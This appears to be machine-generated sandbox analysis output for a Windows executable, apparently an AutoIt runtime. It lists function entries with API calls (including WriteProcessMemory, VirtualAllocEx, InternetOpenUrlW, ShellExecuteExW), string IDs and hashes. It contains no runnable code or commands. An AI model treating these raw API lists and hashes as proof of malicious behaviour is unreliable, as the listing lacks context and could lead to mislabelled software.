                        • API String ID: 1042038666-0
                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                        • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                        • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                        • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                        APIs
                        • __getptd.LIBCMT ref: 0041780F
                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                        • __getptd.LIBCMT ref: 00417826
                        • __amsg_exit.LIBCMT ref: 00417834
                        • __lock.LIBCMT ref: 00417844
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                        • String ID:
                        • API String ID: 938513278-0
                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                        APIs
                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                        • ExitThread.KERNEL32 ref: 00413D4E
                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                        • __freefls@4.LIBCMT ref: 00413D74
                        Similarity
                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                        • String ID:
                        • API String ID: 2403457894-0
                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                        APIs
                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                        • ExitThread.KERNEL32 ref: 004151ED
                        • __freefls@4.LIBCMT ref: 00415209
                        Similarity
                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                        • String ID:
                        • API String ID: 4247068974-0
                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                        Strings
                        Similarity
                        • API ID:
                        • String ID: 5$8$^
                        • API String ID: 0-3622883839
                        • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                        • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                        • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                        • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                        Strings
                        Similarity
                        • API ID:
                        • String ID: )$U$\
                        • API String ID: 0-3705770531
                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                        APIs
                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                        • CoInitialize.OLE32(00000000), ref: 0046E505
                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                        • CoUninitialize.OLE32 ref: 0046E53D
                        Strings
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                        Similarity
                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 708495834-557222456
                        • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                        • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                        APIs
                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                        Strings
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                        APIs
                        Strings
                        Similarity
                        • API ID: _memmove
                        • String ID: \$]$h
                        • API String ID: 4104443479-3262404753
                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                        APIs
                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • CloseHandle.KERNEL32(?), ref: 00457E09
                        Strings
                        Similarity
                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                        • String ID: <$@
                        • API String ID: 2417854910-1426351568
                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                        Strings
                        Similarity
                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 3705125965-3916222277
                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                        APIs
                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                        Strings
                        Similarity
                        • API ID: Menu$Delete$InfoItem
                        • String ID: 0
                        • API String ID: 135850232-4108050209
                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                        Strings
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                        Strings
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: AU3_GetPluginDetails
                        • API String ID: 145871493-4132174516
                        • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                        • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                        Strings
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 3375834691-2298589950
                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: _memmove
                        • String ID: $<
                        • API String ID: 4104443479-428540627
                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID: \VH
                        • API String ID: 1682464887-234962358
                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID: \VH
                        • API String ID: 1682464887-234962358
                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID: \VH
                        • API String ID: 1682464887-234962358
                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: \VH
                        • API String ID: 2507767853-234962358
                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: \VH
                        • API String ID: 2507767853-234962358
                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                        • String ID: crts
                        • API String ID: 943502515-3724388283
                        • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                        • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                        APIs
                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                        • CoInitialize.OLE32(00000000), ref: 0046E505
                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                        • CoUninitialize.OLE32 ref: 0046E53D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                        • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                        • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                        • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ErrorMode$LabelVolume
                        • String ID: \VH
                        • API String ID: 2006950084-234962358
                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • GetMenuItemInfoW.USER32 ref: 00449727
                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                        • DrawMenuBar.USER32 ref: 00449761
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Menu$InfoItem$Draw_malloc
                        • String ID: 0
                        • API String ID: 772068139-4108050209
                        • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                        • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: _wcslen$_wcscpy
                        • String ID: 3, 3, 8, 1
                        • API String ID: 3469035223-357260408
                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpCloseHandle
                        • API String ID: 2574300362-3530519716
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpCreateFile
                        • API String ID: 2574300362-275556492
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpSendEcho
                        • API String ID: 2574300362-58917771
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2574300362-4033151799
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0047950F
                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                        • VariantClear.OLEAUT32(?), ref: 00479650
                        Similarity
                        • API ID: Variant$AllocClearCopyInitString
                        • String ID:
                        • API String ID: 2808897238-0
                        APIs
                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                        • __itow.LIBCMT ref: 004699CD
                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
